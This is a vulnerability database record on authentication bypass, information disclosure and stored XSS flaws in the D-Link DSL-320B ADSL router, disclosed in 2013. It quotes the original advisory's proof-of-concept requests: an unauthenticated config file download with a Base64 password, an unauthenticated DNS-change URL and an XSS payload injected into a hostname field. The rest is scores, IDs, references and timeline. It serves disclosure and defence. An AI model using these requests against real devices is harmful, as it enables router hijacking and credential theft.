Sign-up

ID

VAR-201305-0481


TITLE

D-Link DSL-320B Multiple Authentication Bypass Vulnerabilities

Trust: 0.9

sources: BID: 59659 // CNNVD: CNNVD-201305-118

DESCRIPTION

The D-Link DSL-320B is an ADSL router device. Allowing remote attackers to exploit vulnerabilities to obtain sensitive information or cross-site scripting vulnerabilities can lead to the disclosure of sensitive information or hijacking sessions. D-Link DSL-320B is a modem product of Taiwan D-Link Corporation. D-Link DSL-320B has an HTML injection vulnerability and multiple information disclosure vulnerabilities. Attackers can use these vulnerabilities to disclose sensitive information; when a user browses an affected website, their browser will execute arbitrary code provided by the attacker and steal COOKIE-based authentication credentials in the context of the affected device. An HTML-injection vulnerability 2. This may aid in further attacks. Device: DSL-320B Firmware Version: EU_DSL-320B v1.23 date: 28.12.2010 Vendor URL: http://www.dlink.com/de/de/home-solutions/connect/modems-and-gateways/dsl-320b-adsl-2-ethernet-modem ============ Vulnerability Overview: ============ * Access to the Config file without authentication => full authentication bypass possible! :): (1) 192.168.178.111/config.bin ===<snip>==== <sysUserName value="admin"/> <zipb enable="1"/> <dns dynamic="disable" primary="1.1.1.1" secondary="2.2.2.3" domain="Home" host="alpha"/> <sysPassword value="dGVzdA=="/> ===<snip>==== => sysPassword is Base64 encoded * Access to the logfile without authentication: (1) 192.168.178.111/status/status_log.sys * Change the DNS Settings without authentication: (1) http://192.168.178.111/advanced/adv_dns.xgi?&SET/dns/mode=0&SET/dns/mode/server/primarydns=1.1.1.1&SET/dns/mode/server/secondarydns=2.2.2.2 * Stored XSS within parental control (2): => Parameter: set/bwlist/entry:1/hostname Request: http://192.168.178.111/home/home_parent.xgi?&set/bwlist/enable=1&set/bwlist/bw_status=0&set/bwlist/entry:1/bw_flag=0&set/bwlist/entry:1/hostname=%22%3E%3Cimg%20src=%220%22%20onerror=alert(1)%3E&set/bwlist/entry:1/weekday=6&set/bwlist/entry:1/begintime=00:00&set/bwlist/entry:1/endtime=23:59&set/bwlist/entry:1/store=1&set/bwlist/apply=1 Again you are able to place this XSS without authentication. :) * Login Credentials in HTTP GET are not a good idea => use HTTP Post! (3) http://192.168.178.111/login.xgi?user=admin&pass=admin1 * Credentials in HTTP GET via password change request are not a good idea => use HTTP Post!: (3) http://192.168.178.111/tools/tools_admin.xgi?&set/sys/account/user/oldpwd=admin&set/sys/account/user/password=test&CMT=1 ============ Solution ============ Update to firmware version 1.25: (1) - fixed (2) - not fixed but authentication needed (3) - not fixed ============ Credits ============ The vulnerability was discovered by Michael Messner Mail: devnull#at#s3cur1ty#dot#de Web: http://www.s3cur1ty.de/advisories Twitter: @s3cur1ty_de ============ Time Line: ============ 17.03.2012 - discovered vulnerabilities 17.03.2013 - informed vendor about the vulnerabilities 25.04.2013 - tested beta version from vendor 30.04.2013 - vendor releases patch 06.05.2013 - public disclosure ===================== Advisory end =====================

Trust: 2.79

sources: CNVD: CNVD-2013-04999 // CNVD: CNVD-2013-05000 // CNNVD: CNNVD-201305-118 // CNNVD: CNNVD-201305-117 // BID: 59665 // BID: 59659 // PACKETSTORM: 121526

IOT TAXONOMY

category:['IoT', 'Network device']sub_category: -

Trust: 1.2

sources: CNVD: CNVD-2013-04999 // CNVD: CNVD-2013-05000

AFFECTED PRODUCTS

vendor:d linkmodel:dsl-320bscope: - version: -

Trust: 1.2

sources: CNVD: CNVD-2013-04999 // CNVD: CNVD-2013-05000

CVSS

SEVERITY

CVSSV2

CVSSV3

CNVD: CNVD-2013-04999
value: MEDIUM

Trust: 0.6

CNVD: CNVD-2013-05000
value: MEDIUM

Trust: 0.6

CNVD: CNVD-2013-04999
severity: MEDIUM
baseScore: 6.8
vectorString: AV:N/AC:M/AU:N/C:P/I:P/A:P
accessVector: NETWORK
accessComplexity: MEDIUM
authentication: NONE
confidentialityImpact: PARTIAL
integrityImpact: PARTIAL
availabilityImpact: PARTIAL
exploitabilityScore: 8.6
impactScore: 6.4
acInsufInfo: NONE
obtainAllPrivilege: NONE
obtainUserPrivilege: NONE
obtainOtherPrivilege: NONE
userInteractionRequired: NONE
version: 2.0

Trust: 0.6

CNVD: CNVD-2013-05000
severity: MEDIUM
baseScore: 5.0
vectorString: AV:N/AC:L/AU:N/C:P/I:N/A:N
accessVector: NETWORK
accessComplexity: LOW
authentication: NONE
confidentialityImpact: PARTIAL
integrityImpact: NONE
availabilityImpact: NONE
exploitabilityScore: 10.0
impactScore: 2.9
acInsufInfo: NONE
obtainAllPrivilege: NONE
obtainUserPrivilege: NONE
obtainOtherPrivilege: NONE
userInteractionRequired: NONE
version: 2.0

Trust: 0.6

sources: CNVD: CNVD-2013-04999 // CNVD: CNVD-2013-05000

THREAT TYPE

remote

Trust: 1.2

sources: CNNVD: CNNVD-201305-118 // CNNVD: CNNVD-201305-117

TYPE

Unknown

Trust: 0.6

sources: BID: 59665 // BID: 59659

PATCH

title:D-Link DSL-320B has multiple patches for verifying bypassed vulnerabilitiesurl:https://www.cnvd.org.cn/patchinfo/show/33852

Trust: 0.6

sources: CNVD: CNVD-2013-04999

EXTERNAL IDS

db:BIDid:59659

Trust: 1.5

db:BIDid:59665

Trust: 1.5

db:PACKETSTORMid:121526

Trust: 1.3

db:CNVDid:CNVD-2013-04999

Trust: 0.6

db:CNVDid:CNVD-2013-05000

Trust: 0.6

db:CNNVDid:CNNVD-201305-118

Trust: 0.6

db:CNNVDid:CNNVD-201305-117

Trust: 0.6

sources: CNVD: CNVD-2013-04999 // CNVD: CNVD-2013-05000 // BID: 59665 // BID: 59659 // PACKETSTORM: 121526 // CNNVD: CNNVD-201305-118 // CNNVD: CNNVD-201305-117

REFERENCES

url:http://packetstormsecurity.com/files/121526/d-link-dsl-320b-authentication-bypass-cross-site-scripting.html

Trust: 1.2

url:http://www.dlink.com/

Trust: 0.6

url:http://www.securityfocus.com/bid/59659

Trust: 0.6

url:http://www.securityfocus.com/bid/59665

Trust: 0.6

url:http://www.s3cur1ty.de/advisories

Trust: 0.1

url:http://www.dlink.com/de/de/home-solutions/connect/modems-and-gateways/dsl-320b-adsl-2-ethernet-modem

Trust: 0.1

url:http://192.168.178.111/advanced/adv_dns.xgi?&set/dns/mode=0&set/dns/mode/server/primarydns=1.1.1.1&set/dns/mode/server/secondarydns=2.2.2.2

Trust: 0.1

url:http://192.168.178.111/home/home_parent.xgi?&set/bwlist/enable=1&set/bwlist/bw_status=0&set/bwlist/entry:1/bw_flag=0&set/bwlist/entry:1/hostname=%22%3e%3cimg%20src=%220%22%20onerror=alert(1)%3e&set/bwlist/entry:1/weekday=6&set/bwlist/entry:1/begintime=00:00&set/bwlist/entry:1/endtime=23:59&set/bwlist/entry:1/store=1&set/bwlist/apply=1

Trust: 0.1

url:http://192.168.178.111/tools/tools_admin.xgi?&set/sys/account/user/oldpwd=admin&set/sys/account/user/password=test&cmt=1

Trust: 0.1

url:http://192.168.178.111/login.xgi?user=admin&pass=admin1

Trust: 0.1

sources: CNVD: CNVD-2013-04999 // CNVD: CNVD-2013-05000 // BID: 59665 // BID: 59659 // PACKETSTORM: 121526 // CNNVD: CNNVD-201305-118 // CNNVD: CNNVD-201305-117

CREDITS

Michael Messner

Trust: 1.9

sources: BID: 59665 // BID: 59659 // PACKETSTORM: 121526 // CNNVD: CNNVD-201305-118 // CNNVD: CNNVD-201305-117

SOURCES

db:CNVDid:CNVD-2013-04999
db:CNVDid:CNVD-2013-05000
db:BIDid:59665
db:BIDid:59659
db:PACKETSTORMid:121526
db:CNNVDid:CNNVD-201305-118
db:CNNVDid:CNNVD-201305-117

LAST UPDATE DATE

2022-05-17T02:07:15.073000+00:00


SOURCES UPDATE DATE

db:CNVDid:CNVD-2013-04999date:2013-05-10T00:00:00
db:CNVDid:CNVD-2013-05000date:2013-05-10T00:00:00
db:BIDid:59665date:2013-05-06T00:00:00
db:BIDid:59659date:2013-05-06T00:00:00
db:CNNVDid:CNNVD-201305-118date:2013-05-07T00:00:00
db:CNNVDid:CNNVD-201305-117date:2013-05-07T00:00:00

SOURCES RELEASE DATE

db:CNVDid:CNVD-2013-04999date:2013-05-10T00:00:00
db:CNVDid:CNVD-2013-05000date:2013-05-10T00:00:00
db:BIDid:59665date:2013-05-06T00:00:00
db:BIDid:59659date:2013-05-06T00:00:00
db:PACKETSTORMid:121526date:2013-05-06T15:13:57
db:CNNVDid:CNNVD-201305-118date:2013-05-07T00:00:00
db:CNNVDid:CNNVD-201305-117date:2013-05-07T00:00:00